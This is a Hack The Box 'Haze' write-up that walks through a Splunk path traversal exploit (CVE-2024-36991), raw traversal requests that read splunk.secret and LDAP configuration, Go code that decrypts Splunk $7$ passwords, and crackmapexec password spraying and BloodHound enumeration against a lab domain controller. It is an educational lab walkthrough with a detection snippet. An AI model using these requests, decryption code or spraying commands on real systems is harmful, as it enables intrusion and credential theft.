🧠 HTB Write-Up: Haze
Difficulty: Hard
OS: Linux
Points: 30
Date: 2025-04-07
🔍 Reconnaissance
🔎 Nmap Scan Results
Command Used:
```shell
nmap -sV -sC 10.xx.xx.xx -v
```
Target Host: 10.xx.xx.xx (dc01.haze.htb)
Host OS: Likely Windows Server (Domain Controller)
🟢 Open Ports and Services:
| Port | Service | Version / Notes |
|---|---|---|
| 53 | DNS | Simple DNS Plus |
| 88 | Kerberos-sec | Microsoft Windows Kerberos |
| 135 | MSRPC | Remote Procedure Call |
| 139 | NetBIOS-SSN | SMB legacy support |
| 389 | LDAP | AD LDAP (Domain: haze.htb) |
| 445 | Microsoft-DS | SMB - Likely Active Directory |
| 464 | kpasswd5? | Kerberos Password Change |
| 593 | ncacn_http | RPC over HTTP |
| 636 | LDAPS | Secure LDAP (AD) |
| 3268 | LDAP GC | AD Global Catalog |
| 3269 | LDAPS GC | Secure Global Catalog |
| 8000 | HTTP | Splunk Web Interface (login page) |
| 8088 | HTTPS | Splunkd (API endpoint) |
| 8089 | HTTPS | Splunkd (Mgmt/Service endpoint) |
🧠 Observations:
- This host is a Windows Active Directory Domain Controller (dc01.haze.htb)
- Multiple LDAP/Kerberos services confirm an AD environment
- Splunk appears to be running on ports 8000, 8088, and 8089
- Identified Splunk version 9.2.1 via port 8089
🌐 Enumeration
🔹 Interface Access
- Navigated to http://haze.htb:8000 → Splunk Web login page
- Splunk management available on https://haze.htb:8088 and https://haze.htb:8089
⚠️ Vulnerability Identified
- CVE-2024-36991 – Path Traversal in Splunk
- Affects versions < 9.2.2 (Windows)
- Exploitable via the /modules/messaging/ endpoint
- Allows arbitrary file read on the host
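From the defender's side, the request shape used against this endpoint is easy to spot in Splunk's web access logs. The following Go check is an added example (not part of the original write-up) that flags requests under /modules/messaging/ whose decoded path walks upward; the log lines are constructed samples modelled on the requests shown later in this write-up.

```go
package main

import (
	"net/url"
	"strings"
)

// Constructed access-log style lines (sample data, not taken from the box); the first two
// mimic the "C%3A../" and backslash forms of the CVE-2024-36991 request, the rest are benign.
var sampleLog = []string{
	`10.0.0.5 - - [07/Apr/2025:10:01:02] "GET /en-US/modules/messaging/C%3A../C%3A../C%3A../etc/auth/splunk.secret HTTP/1.1" 200 254`,
	`10.0.0.5 - - [07/Apr/2025:10:01:05] "GET /en-US/modules/messaging/..%5C..%5Cetc%5Csystem%5Clocal%5Cauthentication.conf HTTP/1.1" 200 512`,
	`10.0.0.9 - - [07/Apr/2025:10:02:00] "GET /en-US/modules/messaging/messaging.js HTTP/1.1" 200 5120`,
	`10.0.0.9 - - [07/Apr/2025:10:02:01] "GET /en-US/account/login HTTP/1.1" 200 3000`,
}

// requestPath extracts the request target from the quoted "METHOD PATH VERSION" field.
func requestPath(line string) string {
	parts := strings.Split(line, `"`)
	if len(parts) < 2 {
		return ""
	}
	f := strings.Fields(parts[1])
	if len(f) < 2 {
		return ""
	}
	return f[1]
}

// IsMessagingTraversal reports whether a request under /modules/messaging/ walks upward once
// percent-decoded. A plain ".." is caught, and so is the Windows drive-relative form "C:.."
// that the unpatched endpoint did not normalize; both "/" and "\" are treated as separators.
func IsMessagingTraversal(rawPath string) bool {
	p, err := url.PathUnescape(rawPath)
	if err != nil {
		p = rawPath // undecodable input is still inspected as-is
	}
	at := strings.Index(strings.ToLower(p), "/modules/messaging/")
	if at < 0 {
		return false
	}
	isSep := func(r rune) bool { return r == '/' || r == '\\' }
	for _, seg := range strings.FieldsFunc(p[at+len("/modules/messaging/"):], isSep) {
		if seg == ".." || strings.HasSuffix(seg, ":..") {
			return true
		}
	}
	return false
}
```

Run it over splunkd_access.log (or the reverse proxy's log) to find historical attempts; a hit on a file such as splunk.secret should be treated as a credential compromise, since that key decrypts every $7$ value in the configuration.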
📸 PoC Search on GitHub:

🧪 Exploit Usage
```
python CVE-2024-36991.py -u http://haze.htb:8000/
[VLUN] Vulnerable: http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:[email protected]:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::[email protected]:user:[email protected]:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:[email protected]:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:[email protected]:::20152
```

👥 Extracted Usernames (from Splunk config)
From the Splunk path traversal exploit output above (the local Splunk passwd file), the following potential user accounts were identified:
- admin
- edward
- mark
- paul
🛠️ Continued Exploitation – Splunk File Reads
Since the password hashes could not be cracked, the next logical step was to modify the CVE-2024-36991 exploit to read other sensitive files.
📄 Target: Splunk Configuration File
Goal: Identify Splunk’s installation path and pivot to read additional files.
Exploitation Path Used:
```
.../Program%20Files/Splunk/etc/splunk-launch.conf
```
📄 Read: splunk-launch.conf
File Content:
```ini
# Version 9.2.1
# Modify the following line to suit the location of your Splunk install.
# If unset, Splunk will use the parent of the directory containing the splunk CLI executable.
SPLUNK_HOME=C:\Program Files\Splunk
# By default, Splunk stores its indexes under SPLUNK_HOME in the var\lib\splunk subdirectory.
# This can be overridden here:
# SPLUNK_DB=C:\builds\splcore\main\build_home\splunk\var\lib\splunk
# Splunkd service name
SPLUNK_SERVER_NAME=Splunkd
PYTHONHTTPSVERIFY=0
PYTHONUTF8=1
```
📄 Read: authentication.conf
Request Used:
```http
GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/system/local/authentication.conf HTTP/1.1
Host: dc01.haze.htb:8000
```
File Content:
```ini
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
```
Key Findings:
- LDAP auth enabled (authType = LDAP)
- Bind DN: CN=Paul Taylor,CN=Users,DC=haze,DC=htb
- Bind password stored encrypted (bindDNpassword, $7$ format)
📄 Read: splunk.secret
To decrypt the LDAP bind password (bindDNpassword), Splunk uses a master key stored in splunk.secret.
Request Used:
```http
GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/auth/splunk.secret HTTP/1.1
Host: dc01.haze.htb:8000
```
File Content:
```
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
```
📌 Tool Required to Decrypt:
splunksecrets by HurricaneLabs
🔓 Decrypted LDAP Password – Paul Taylor
After retrieving both the encrypted password from authentication.conf and the splunk.secret master key, we successfully decrypted the LDAP credentials for Paul Taylor.
🔐 Ciphertext (from authentication.conf)
```
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
```
🧰 Tool Used
- [`splunksecrets`](https://github.com/HurricaneLabs/splunksecrets)
🧪 Command Executed
```shell
splunksecrets splunk-decrypt -S splunk.secret
```
✅ Decrypted Result
```
Ld@p_Auth_Sp1unk@2k24
```
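To make clear what the splunksecrets step computes, and why a readable splunk.secret is equivalent to plaintext credentials, here is an added Go re-implementation of the $7$ decryption (written for this write-up, not the tool's or Splunk's own code). It uses the splunk.secret and bindDNpassword values read above and assumes the scheme splunksecrets implements: PBKDF2-HMAC-SHA256 over the first 254 bytes of the secret with salt "disk-encryption" and one iteration, then AES-256-GCM with a 16-byte IV and 16-byte tag.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"strings"
)

// Values read from the target above: splunk.secret and the bindDNpassword from authentication.conf.
const splunkSecret = "NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD"
const bindDNpassword = "$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY="

// deriveKey is PBKDF2-HMAC-SHA256(secret[:254], "disk-encryption", 1 iteration, 32 bytes);
// with one iteration and a 32-byte output that is a single HMAC over salt || INT_BE(1).
func deriveKey(secret string) []byte {
	if len(secret) > 254 {
		secret = secret[:254]
	}
	mac := hmac.New(sha256.New, []byte(secret))
	mac.Write([]byte("disk-encryption"))
	mac.Write([]byte{0, 0, 0, 1})
	return mac.Sum(nil)
}

// DecryptSplunk7 decodes a "$7$" value as base64(IV[16] || AES-256-GCM ciphertext || tag[16])
// and decrypts it; a wrong secret fails the GCM tag check rather than yielding garbage.
func DecryptSplunk7(secret, encoded string) (string, error) {
	if !strings.HasPrefix(encoded, "$7$") {
		return "", fmt.Errorf("not a $7$ ciphertext")
	}
	raw, err := base64.StdEncoding.DecodeString(encoded[3:])
	if err != nil || len(raw) < 32 {
		return "", fmt.Errorf("payload is not base64(IV || ciphertext || tag): %v", err)
	}
	block, _ := aes.NewCipher(deriveKey(secret))         // 32-byte key, cannot fail
	gcm, _ := cipher.NewGCMWithNonceSize(block, 16)      // Splunk uses a 16-byte IV, not GCM's default 12
	plain, err := gcm.Open(nil, raw[:16], raw[16:], nil) // raw[16:] is ciphertext || tag
	if err != nil {
		return "", fmt.Errorf("decryption failed (wrong splunk.secret?): %w", err)
	}
	return string(plain), nil
}

func main() {
	fmt.Println(DecryptSplunk7(splunkSecret, bindDNpassword))
}
```

The same key decrypts every $7$ value in the instance's configuration, which is why splunk.secret should be treated with the same care as the credentials it protects and rotated after any exposure.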

🎯 Initial Foothold
Used crackmapexec to test the credentials against SMB on the domain controller.
Command:
```shell
crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
```
Output:
```
SMB 10.xx.xx.xx 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
```
Confirmed: Credentials are valid for domain user paul.taylor
After confirming access with paul.taylor, we performed RID brute-force enumeration against the Domain Controller to enumerate valid users.
🧪 Command:
```shell
crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser'
```
Output:
```
500: HAZE\Administrator
501: HAZE\Guest
502: HAZE\krbtgt
1000: HAZE\DC01$
1103: HAZE\paul.taylor
1104: HAZE\mark.adams
1105: HAZE\edward.martin
1106: HAZE\alexander.green
1111: HAZE\Haze-IT-Backup$
```
Several additional domain users are visible in the output.
After identifying additional domain users via RID brute-force, we performed password spraying to test for reused credentials.
🧪 Command:
```shell
crackmapexec smb haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
```
Note: users.txt contains:
```
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
```
✅ Successful Login:
```
SMB 10.xx.xx.xx 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
```
🕵️ Domain Recon – BloodHound Enumeration
After gaining valid domain credentials (mark.adams), we used BloodHound to enumerate Active Directory objects and relationships.
```shell
bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -dc dc01.haze.htb -ns 10.xx.xx.xx -c all --zip
```
Output:
```
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 17S
INFO: Compressing output into 202504_bloodhound.zip
```
🧠 Key Takeaways:
- Successfully retrieved data from the domain controller (dc01.haze.htb)
- Output saved as a ZIP file for analysis in the BloodHound GUI